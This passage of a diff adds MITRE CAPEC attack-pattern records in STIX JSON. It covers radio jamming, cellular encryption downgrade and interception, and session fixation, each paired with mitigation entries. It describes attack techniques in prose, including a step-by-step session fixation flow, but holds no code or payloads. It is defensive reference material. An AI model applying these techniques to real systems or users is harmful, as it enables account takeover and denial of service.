"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3123edea-0c54-4b71-be21-4d83cea9c940", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5589acda-9084-4d60-a9f7-5bb13e6d9196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba6343af-b630-429a-b10a-f9e9ac7ff6a2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses radio noise or signals in an attempt to disrupt communications. 
By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.", + "external_references": [ + { + "external_id": "CAPEC-601", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/601.html" + } + ], + "id": "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (The jamming of equipment denies the availability of functioning communications services.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-602", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--2fb09678-092a-490d-b2da-fff20a696219", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Degradation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": 
"2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary blocks the delivery of an important system resource causing the system to fail or stop working.", + "external_references": [ + { + "external_id": "CAPEC-603", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/603.html" + } + ], + "id": "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Blockage", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Blocking a resource from functional operation denies its availability to authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "attack-pattern--5c216971-78b5-4ac1-9cbe-f46fe1c632d1", + "attack-pattern--807e5b36-9da9-4be8-9f6e-5d8c7258cff5" + ], + "x_capec_prerequisites": [ + "This attack pattern requires knowledge of where important system resources are logically located as well as how they operate." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack – for example: the attacker may flood the Wi-Fi access point (e.g. 
the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.", + "external_references": [ + { + "external_id": "CAPEC-604", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/604.html" + } + ], + "id": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Wi-Fi Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the Wi-fi network to authorized users.)", + "Resource Consumption (The attacker's goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Lack of anti-jam features in 802.11", + "Lack of authentication on deauthentication/disassociation packets on 802.11-based networks" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi.", + "id": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-604-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52128fa2-afdb-4097-bdd6-8f3b3095fc56", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60934a01-b877-4253-9984-be3bf3629ab7", + "spec_version": "2.1", + "target_ref": "attack-pattern--bac3d2d8-864c-4519-8e16-6d4e4fee6031", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. 
For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. 
By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.", + "id": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-605-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--10c74aec-704c-47cf-ae7a-7f2c590c4166", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5afa1aa9-7585-4544-991c-9152f9024393", + "spec_version": "2.1", + "target_ref": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).", + "external_references": [ + { + "external_id": "CAPEC-606", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/606.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + } + ], + "id": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Weakening of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Tracking, Network Reconnaissance)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks." + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.", + "id": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9467c544-8557-428f-9ebe-8a1fcc52a7f9", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "spec_version": "2.1", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption.", + "id": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-606-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--913cda1e-62b6-4e54-9557-3e3626768a59", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "spec_version": "2.1", + "target_ref": "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or cause the system to stop working as intended. 
This can cause the system components to be unavailable until the obstruction mitigated.", + "external_references": [ + { + "external_id": "CAPEC-607", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/607.html" + } + ], + "id": "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Obstruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--61546d1a-d720-4609-89ca-12039268d502" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a", + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. 
Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.", + "external_references": [ + { + "external_id": "CAPEC-608", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/608.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + } + ], + "id": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Cryptanalysis of Cellular Encryption", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--75de4a67-623a-4c5a-a757-9f143a48b1d9", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a04126f1-f0a0-4aa1-99e0-711b2d3e96d7", + "spec_version": "2.1", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56a59dd2-1721-46b2-84d7-cdcd15e06ca7", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0d5b9cf-bcc9-4462-a783-d4e7f17ceada", + "spec_version": "2.1", + "target_ref": "attack-pattern--9dded599-dd66-4a4c-8f17-6afb81c234f8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. 
Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.", + "external_references": [ + { + "external_id": "CAPEC-609", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/609.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Traffic Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.))" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \"rogue\" BTS stations is poor in many areas and it is assumed that \"rogue\" BTS stations exist in urban areas." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.", + "id": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-609-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4813a8a-b41c-4718-8323-0bdb7fabf19c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b42679-6d45-41dc-b732-6310e2569805", + "spec_version": "2.1", + "target_ref": "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. 
This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.", + "external_references": [ + { + "external_id": "CAPEC-61", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Session Fixation", + "external_id": "37", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Session-Fixation" + }, + { + "description": "Session fixation", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_fixation" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-601", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation.html" + } + ], + "id": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Session Fixation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider a banking application that issues a session identifier in the URL to a user before login, and uses the same identifier to identify the customer following successful authentication. An attacker can easily leverage session fixation to access a victim's account by having the victim click on a forged link that contains a valid session identifier from a trapped session setup by the attacker. 
Once the victim is authenticated, the attacker can take over the session and continue with the same levels of privilege as the victim.", + "An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Setup the Attack: Setup a session: The attacker has to setup a trap session that provides a valid session identifier, or select an arbitrary identifier, depending on the mechanism employed by the application. A trap session is a dummy session established with the application by the attacker and is used solely for the purpose of obtaining valid session identifiers. The attacker may also be required to periodically refresh the trap session in order to obtain valid session identifiers.

  2. Techniques
    The attacker chooses a predefined identifier that they know.
    The attacker creates a trap session for the victim.

Experiment

  1. Attract a Victim: Fixate the session: The attacker now needs to transfer the session identifier from the trap session to the victim by introducing the session identifier into the victim's browser. This is known as fixating the session. The session identifier can be introduced into the victim's browser by leveraging cross site scripting vulnerability, using META tags or setting HTTP response headers in a variety of ways.

  2. Techniques
    Attackers can put links on web sites (such as forums, blogs, or comment forms).
    Attackers can establish rogue proxy servers for network protocols that give out the session ID and then redirect the connection to the legitimate service.
    Attackers can email attack URLs to potential victims through spam and phishing techniques.

Exploit

  1. Abuse the Victim's Session: Takeover the fixated session: Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the fixated session identifier.

  2. Techniques
    The attacker loads the predefined session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Session identifiers that remain unchanged when the privilege levels change.", + "Permissive session management mechanism that accepts random user-generated session identifiers", + "Predictable session identifiers" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Only basic skills are required to determine and fixate session identifiers in a user's browser. Subsequent attacks may require greater skill levels depending on the attackers' motives." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.", + "id": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d553a19-deeb-45df-b70d-71110b119c7c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b187831e-a53c-465d-b72f-49df78479e67", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
